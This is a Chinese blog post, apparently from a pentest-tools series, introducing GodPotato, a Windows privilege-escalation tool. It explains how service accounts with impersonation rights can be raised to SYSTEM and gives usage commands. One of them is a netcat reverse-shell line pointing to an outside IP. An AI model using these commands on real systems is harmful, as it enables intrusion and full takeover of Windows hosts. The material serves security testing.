神薯
根据Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一项新技术,可以在Windows 2012 - Windows 2022中实现提权,现在只要你有“冒充特权”权限。那么你就是“NT AUTHORITYSYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
马铃薯提权通常用在我们获取WEB/数据库权限的时候。我们可以将低权限的服务用户提升为“NT AUTHORITYSYSTEM”权限。然而历史上的Potato却没有办法在最新的Windows系统上运行。当我研究DCOM时,我发现了一种可以执行权限提升的新方法。rpcss在处理ox时存在一些缺陷,rpcss是系统必须开启的服务。,所以它几乎可以运行在任何Windows操作系统上,我将它命名为GodPotato
受影响版本
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
使用程序内置的Clsid进行权限提升并执行简单的命令
GodPotato -cmd "cmd /c whoami"
自定义Clsid并执行命令
GodPotato -cmd "cmd /c whoami"
执行反向shell命令
GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"项目地址:
https://github.com/BeichenDream/GodPotato
2023年最受欢迎的渗透测试工具(1) - PhoneSploit-Pro
2023年最受欢迎的渗透测试工具(3)- Faraday 开源漏洞管理平台
2023年最受欢迎的渗透测试工具(4)- CloakQuest3r 隐藏真实IP
2023年最受欢迎的渗透测试工具(5)- Killer Bypass AV
2023年最受欢迎的渗透测试工具(6)- waf-bypass
2023年最受欢迎的渗透测试工具(7)- 支持 GPT 的渗透测试工具
2023年最受欢迎的渗透测试工具(8)- Sirius 漏洞扫描器
2023年最受欢迎的渗透测试工具(9)- Linux 安全和监控脚本
原文始发于微信公众号(TtTeam):2023年最受欢迎的渗透测试工具(10)- GodPotato 提权土豆
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论